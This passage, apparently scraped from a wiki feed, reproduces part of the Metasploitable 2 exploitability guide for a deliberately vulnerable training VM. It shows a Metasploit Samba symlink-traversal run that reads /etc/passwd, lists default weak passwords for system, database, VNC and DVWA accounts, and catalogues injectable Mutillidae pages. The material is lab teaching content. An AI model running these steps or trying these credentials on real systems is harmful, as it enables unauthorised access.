Samba, when configured with a writeable file share and &amp;quot;wide links&amp;quot; enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# smbclient -L //192.168.99.131&lt;br /&gt;
Anonymous login successful&lt;br /&gt;
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]&lt;br /&gt;
&lt;br /&gt;
        Sharename       Type      Comment&lt;br /&gt;
        ---------       ----      -------&lt;br /&gt;
        print$          Disk      Printer Drivers&lt;br /&gt;
        tmp             Disk      oh noes!&lt;br /&gt;
        opt             Disk     &lt;br /&gt;
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))&lt;br /&gt;
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# msfconsole&lt;br /&gt;
msf &amp;gt; use auxiliary/admin/smb/samba_symlink_traversal&lt;br /&gt;
msf  auxiliary(samba_symlink_traversal) &amp;gt; set RHOST 192.168.99.131&lt;br /&gt;
msf  auxiliary(samba_symlink_traversal) &amp;gt; set SMBSHARE tmp&lt;br /&gt;
msf  auxiliary(samba_symlink_traversal) &amp;gt; exploit&lt;br /&gt;
&lt;br /&gt;
[*] Connecting to the server...&lt;br /&gt;
[*] Trying to mount writeable share 'tmp'...&lt;br /&gt;
[*] Trying to link 'rootfs' to the root filesystem...&lt;br /&gt;
[*] Now access the following share to browse the root filesystem:&lt;br /&gt;
[*]     \\192.168.99.131\tmp\rootfs\&lt;br /&gt;
&lt;br /&gt;
msf  auxiliary(samba_symlink_traversal) &amp;gt; exit&lt;br /&gt;
&lt;br /&gt;
root@ubuntu:~# smbclient //192.168.99.131/tmp&lt;br /&gt;
Anonymous login successful&lt;br /&gt;
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]&lt;br /&gt;
smb: \&amp;gt; cd rootfs&lt;br /&gt;
smb: \rootfs\&amp;gt; cd etc&lt;br /&gt;
smb: \rootfs\etc\&amp;gt; more passwd&lt;br /&gt;
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)&lt;br /&gt;
root:x:0:0:root:/root:/bin/bash&lt;br /&gt;
daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;br /&gt;
bin:x:2:2:bin:/bin:/bin/sh&lt;br /&gt;
[..]&lt;br /&gt;
&lt;br /&gt;
Weak Passwords&lt;br /&gt;
&lt;br /&gt;
In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.&lt;br /&gt;
Account Name&lt;br /&gt;
Password&lt;br /&gt;
&lt;br /&gt;
msfadmin&lt;br /&gt;
&lt;br /&gt;
msfadmin&lt;br /&gt;
&lt;br /&gt;
user&lt;br /&gt;
&lt;br /&gt;
user&lt;br /&gt;
&lt;br /&gt;
postgres&lt;br /&gt;
&lt;br /&gt;
postgres&lt;br /&gt;
&lt;br /&gt;
sys&lt;br /&gt;
&lt;br /&gt;
batman&lt;br /&gt;
&lt;br /&gt;
klog&lt;br /&gt;
&lt;br /&gt;
123456789&lt;br /&gt;
&lt;br /&gt;
service&lt;br /&gt;
&lt;br /&gt;
service&lt;br /&gt;
&lt;br /&gt;
In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. The VNC service provides remote desktop access using the password password.&lt;br /&gt;
Vulnerable Web Services&lt;br /&gt;
&lt;br /&gt;
Metasploitable 2 has deliberately vulnerable web applications pre-installed. The web server starts automatically when Metasploitable 2 is booted. To access the web applications, open a web browser and enter the URL http://&amp;lt;IP&amp;gt; where &amp;lt;IP&amp;gt; is the IP address of Metasploitable 2. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from &amp;quot;NAT&amp;quot; to &amp;quot;Host Only&amp;quot;. (Note: A video tutorial on installing Metasploitable 2 is available here.)&lt;br /&gt;
&lt;br /&gt;
In this example, Metasploitable 2 is running at IP 192.168.56.101. Browsing to http://192.168.56.101/ shows the web application home page.&lt;br /&gt;
&lt;br /&gt;
192.168.56/24 is the default &amp;quot;host only&amp;quot; network in Virtual Box. IP address are assigned starting from &amp;quot;101&amp;quot;. Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary.&lt;br /&gt;
&lt;br /&gt;
To access a particular web application, click on one of the links provided. Individual web applications may additionally be accessed by appending the application directory name onto http://&amp;lt;IP&amp;gt; to create URL http://&amp;lt;IP&amp;gt;/&amp;lt;Application Folder&amp;gt;/. For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. The applications are installed in Metasploitable 2 in the /var/www directory. (Note: See a list with command ls /var/www.) In the current version as of this writing, the applications are&lt;br /&gt;
&lt;br /&gt;
    mutillidae (NOWASP Mutillidae 2.1.19)&lt;br /&gt;
    dvwa (Damn Vulnerable Web Application)&lt;br /&gt;
    phpMyAdmin&lt;br /&gt;
    tikiwiki (TWiki)&lt;br /&gt;
    tikiwiki-old&lt;br /&gt;
    dav (WebDav)&lt;br /&gt;
&lt;br /&gt;
Mutillidae&lt;br /&gt;
&lt;br /&gt;
The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Inspired by DVWA, Mutillidae allows the user to change the &amp;quot;Security Level&amp;quot; from 0 (completely insecure) to 5 (secure). Additionally three levels of hints are provided ranging from &amp;quot;Level 0 - I try harder&amp;quot; (no hints) to &amp;quot;Level 2 - noob&amp;quot; (Maximum hints). If the application is damaged by user injections and hacks, clicking the &amp;quot;Reset DB&amp;quot; button resets the application to its original state.&lt;br /&gt;
&lt;br /&gt;
Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.&lt;br /&gt;
&lt;br /&gt;
Enable hints in the application by click the &amp;quot;Toggle Hints&amp;quot; button on the menu bar:&lt;br /&gt;
&lt;br /&gt;
The Mutillidae application contains at least the following vulnerabilities on these respective pages:&lt;br /&gt;
Page&lt;br /&gt;
Vulnerabilities&lt;br /&gt;
&lt;br /&gt;
add-to-your-blog.php&lt;br /&gt;
&lt;br /&gt;
SQL Injection on blog entry&lt;br /&gt;
SQL Injection on logged in user name&lt;br /&gt;
Cross site scripting on blog entry&lt;br /&gt;
Cross site scripting on logged in user name&lt;br /&gt;
Log injection on logged in user name&lt;br /&gt;
CSRF&lt;br /&gt;
JavaScript validation bypass&lt;br /&gt;
XSS in the form title via logged in username&lt;br /&gt;
The show-hints cookie can be changed by user to enable hints even though they are not supposed to show in secure mode&lt;br /&gt;
&lt;br /&gt;
arbitrary-file-inclusion.php&lt;br /&gt;
&lt;br /&gt;
System file compromise&lt;br /&gt;
Load any page from any site&lt;br /&gt;
&lt;br /&gt;
browser-info.php&lt;br /&gt;
&lt;br /&gt;
XSS via referer HTTP header&lt;br /&gt;
JS Injection via referer HTTP header&lt;br /&gt;
XSS via user-agent string HTTP header&lt;br /&gt;
&lt;br /&gt;
capture-data.php&lt;br /&gt;
&lt;br /&gt;
XSS via any GET, POST, or Cookie&lt;br /&gt;
&lt;br /&gt;
captured-data.php&lt;br /&gt;
&lt;br /&gt;
XSS via any GET, POST, or Cookie&lt;br /&gt;
&lt;br /&gt;
config.inc*&lt;br /&gt;
&lt;br /&gt;
Contains unencrytped database credentials&lt;br /&gt;
&lt;br /&gt;
credits.php&lt;br /&gt;
&lt;br /&gt;
Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
dns-lookup.php&lt;br /&gt;
&lt;br /&gt;
Cross site scripting on the host/ip field&lt;br /&gt;
O/S Command injection on the host/ip field&lt;br /&gt;
This page writes to the log. SQLi and XSS on the log are possible&lt;br /&gt;
GET for POST is possible because only reading POSTed variables is not enforced.&lt;br /&gt;
&lt;br /&gt;
footer.php*&lt;br /&gt;
&lt;br /&gt;
Cross site scripting via the HTTP_USER_AGENT HTTP header.&lt;br /&gt;
&lt;br /&gt;
framing.php&lt;br /&gt;
&lt;br /&gt;
Click-jacking&lt;br /&gt;
&lt;br /&gt;
header.php*&lt;br /&gt;
&lt;br /&gt;
XSS via logged in user name and signature&lt;br /&gt;
The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1&lt;br /&gt;
&lt;br /&gt;
html5-storage.php&lt;br /&gt;
&lt;br /&gt;
DOM injection on the add-key error message because the key entered is output into the error message without being encoded&lt;br /&gt;
&lt;br /&gt;
index.php*&lt;br /&gt;
&lt;br /&gt;
You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value.&lt;br /&gt;
You can SQL injection the UID cookie value because it is used to do a lookup&lt;br /&gt;
You can change your rank to admin by altering the UID value&lt;br /&gt;
HTTP Response Splitting via the logged in user name because it is used to create an HTTP Header&lt;br /&gt;
This page is responsible for cache-control but fails to do so&lt;br /&gt;
This page allows the X-Powered-By HTTP header&lt;br /&gt;
HTML comments&lt;br /&gt;
There are secret pages that if browsed to will redirect user to the phpinfo.php page. This can be done via brute forcing&lt;br /&gt;
&lt;br /&gt;
log-visit.php&lt;br /&gt;
&lt;br /&gt;
SQL injection and XSS via referer HTTP header&lt;br /&gt;
SQL injection and XSS via user-agent string&lt;br /&gt;
&lt;br /&gt;
login.php&lt;br /&gt;
&lt;br /&gt;
Authentication bypass SQL injection via the username field and password field&lt;br /&gt;
SQL injection via the username field and password field&lt;br /&gt;
XSS via username field&lt;br /&gt;
JavaScript validation bypass&lt;br /&gt;
&lt;br /&gt;
password-generator.php&lt;br /&gt;
&lt;br /&gt;
JavaScript injection&lt;br /&gt;
&lt;br /&gt;
pen-test-tool-lookup.php&lt;br /&gt;
&lt;br /&gt;
JSON injection&lt;br /&gt;
&lt;br /&gt;
phpinfo.php&lt;br /&gt;
&lt;br /&gt;
This page gives away the PHP server configuration&lt;br /&gt;
Application path disclosure&lt;br /&gt;
Platform path disclosure&lt;br /&gt;
&lt;br /&gt;
process-commands.php&lt;br /&gt;
&lt;br /&gt;
Creates cookies but does not make them HTML only&lt;br /&gt;
&lt;br /&gt;
process-login-attempt.php&lt;br /&gt;
&lt;br /&gt;
Same as login.php. This is the action page.&lt;br /&gt;
&lt;br /&gt;
redirectandlog.php&lt;br /&gt;
&lt;br /&gt;
Same as credits.php. This is the action page&lt;br /&gt;
&lt;br /&gt;
register.php&lt;br /&gt;
&lt;br /&gt;
SQL injection and XSS via the username, signature and password field&lt;br /&gt;
&lt;br /&gt;
rene-magritte.php&lt;br /&gt;
&lt;br /&gt;
Click-jacking&lt;br /&gt;
&lt;br /&gt;
robots.txt&lt;br /&gt;
&lt;br /&gt;
Contains directories that are supposed to be private&lt;br /&gt;
&lt;br /&gt;
secret-administrative-pages.php&lt;br /&gt;
&lt;br /&gt;
This page gives hints about how to discover the server configuration&lt;br /&gt;
&lt;br /&gt;
set-background-color.php&lt;br /&gt;
&lt;br /&gt;
Cascading style sheet injection and XSS via the color field&lt;br /&gt;
&lt;br /&gt;
show-log.php&lt;br /&gt;
&lt;br /&gt;
Denial of Service if you fill up the log&lt;br /&gt;
XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields&lt;br /&gt;
&lt;br /&gt;
site-footer-xss-discusson.php&lt;br /&gt;
&lt;br /&gt;
XSS via the user agent string HTTP header&lt;br /&gt;
&lt;br /&gt;
source-viewer.php&lt;br /&gt;
&lt;br /&gt;
Loading of any arbitrary file including operating system files.&lt;br /&gt;
&lt;br /&gt;
text-file-viewer.php&lt;br /&gt;
&lt;br /&gt;
Loading of any arbitrary web page on the Interet or locally including the sites password files.&lt;br /&gt;
Phishing&lt;br /&gt;
&lt;br /&gt;
user-info.php&lt;br /&gt;
&lt;br /&gt;
SQL injection to dump all usernames and passwords via the username field or the password field&lt;br /&gt;
XSS via any of the displayed fields. Inject the XSS on the register.php page.&lt;br /&gt;
XSS via the username field&lt;br /&gt;
&lt;br /&gt;
user-poll.php&lt;br /&gt;
&lt;br /&gt;
Parameter pollution&lt;br /&gt;
GET for POST&lt;br /&gt;
XSS via the choice parameter&lt;br /&gt;
Cross site request forgery to force user choice&lt;br /&gt;
&lt;br /&gt;
view-someones-blog.php&lt;br /&gt;
&lt;br /&gt;
XSS via any of the displayed fields. They are input on the add to your blog page.&lt;br /&gt;
DVWA&lt;br /&gt;
&lt;br /&gt;
From the DVWA home page: &amp;quot;Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App.&lt;br /&gt;
&lt;br /&gt;
    Default username - admin&lt;br /&gt;
        Default password - password&lt;br /&gt;
&lt;br /&gt;
Information Disclosure&lt;br /&gt;
&lt;br /&gt;
Additionally, an ill-advised PHP information disclosure page can be found at http://&amp;lt;IP&amp;gt;/phpinfo.php. In this example, the URL would be http://192.168.56.101/phpinfo.php. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2.&lt;br /&gt;
&lt;br /&gt;
You can download Metasploitable 2 here.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Metasploitable]]&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>